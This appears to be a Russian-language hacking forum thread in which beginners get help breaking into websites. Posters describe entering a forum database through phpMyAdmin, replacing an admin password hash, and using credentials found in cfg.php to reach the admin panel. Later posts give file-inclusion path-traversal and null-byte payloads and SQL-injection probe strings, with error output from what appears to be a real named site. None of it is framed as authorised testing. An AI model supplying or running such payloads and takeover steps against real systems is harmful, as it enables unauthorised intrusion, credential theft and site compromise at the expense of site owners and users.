Вопрос Я то в базу попал смотрю все пароли в ibf_members_converge потом беру меняю на свой пассворд захожу в сайт/admin и ничего
Я до этого не читал что там и как, но рискну предположить что ты поменял только хеш, но не соль. непомню табличку, погугли.
Я же тебе в личку писал..что это база форума..и что все пароли из этой базы только к форуму... а в файле cfg.php пароль и логин для подключения к другой базе...где другие таблицы и другие пароли...
ответ да я попал в phpAdmin там всего 2 базы 1-База форума 2-information_schema в information_schema всего 17 полей я все просмотрел ничего про пароли нет! CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS # Обзор USER_PRIVILEGES # Обзор VIEWS
2 massovka: жжошь)) Я даже не знаю, что сказать на это. Все эти "17 полей", которые на самом деле таблицы, бесполезны и всегда даже пропускаются при дампе базы
information_schema это системна бд мускуля 5 ветки...ты там максимум можешь только таблички узнать.колонки..и базды данных..(названия) Я тебе ещё раз говорю..подключись к базе используя логин и пароль в файле cfg.php
Спасибо Все спасибо всем наконец получилось оказуется там еще одна база была и все это время я нетам смотрел! что значит чайник прочита пароль и попал в админку
юзер под которого ты зашёл в пма не имеет прав на доступ к таблице админкиверрнее к бд делай чё демоноид говорит
Всем привет ПХП иньекциями заинтересовался, нашел кое-что, хотел бы чтобы прояснили: УРЛ Code: http://www.server.com/?lang=en HTML: Warning: include(tmpl/en/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot\server\index.php on line 41 Warning: include() [function.include]: Failed opening 'tmpl/en/error.htm' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\server\index.php on line 41 ------ Code: http://www.server.com/?lang=http://www.google.com HTML: Warning: include(tmpl/http://www.google.com/error.htm) [function.include]: failed to open stream: Invalid argument in C:\Inetpub\wwwroot\server\index.php on line 41 Warning: include() [function.include]: Failed opening 'tmpl/http://www.google.com/error.htm' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\server\index.php on line 41 Выходит, что разрешен инклудинг только локальных файлов?
2 4adr0s нет, можешь подняться выше: ../../../../boot.ini%00 если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/ з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал
Я тут пытался провести SQL-inj И у меня не получается, помогите плиз... Ошибочка id=1' Так тоже ошибка id=1'-- Потом востановил запрос id=1-- Затем попробовал попробовать id=1+and+1=1-- ошибки нет id=1+and+1=2-- ошибки нет И так тоже нет ошибки id=1+group+by+99-- как можно попробовать?
Мде ни текста ошибки,ни хрена...( Урл вообще в идеале..... Поставь "+" в конец запроса,может из за отсутсвия пробела дальнейший запрос не обрезаеться(Это лишь предположение,мож скули нет,вообще)
Byrger если id=1+or+1=1-- и id=1+or+1=2-- разные тогда это скуля если нет тогда пробуй id=1'+or+1=1-- id=1'+or+1=2--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1 Можно тут что-нибудь сделать?
Неа... все жестко, и мир жесток... Code: Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
А ты понаблюдай за запросом и поведением ошибки и сам попробуй понять можно или нет: Code: http://catalog.uvaga.by/model_mark/?go=-1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1 Code: http://catalog.uvaga.by/model_mark/?go=-10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30,3' at line 1 Code: http://catalog.uvaga.by/model_mark/?go=-100 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-300,3' at line 1
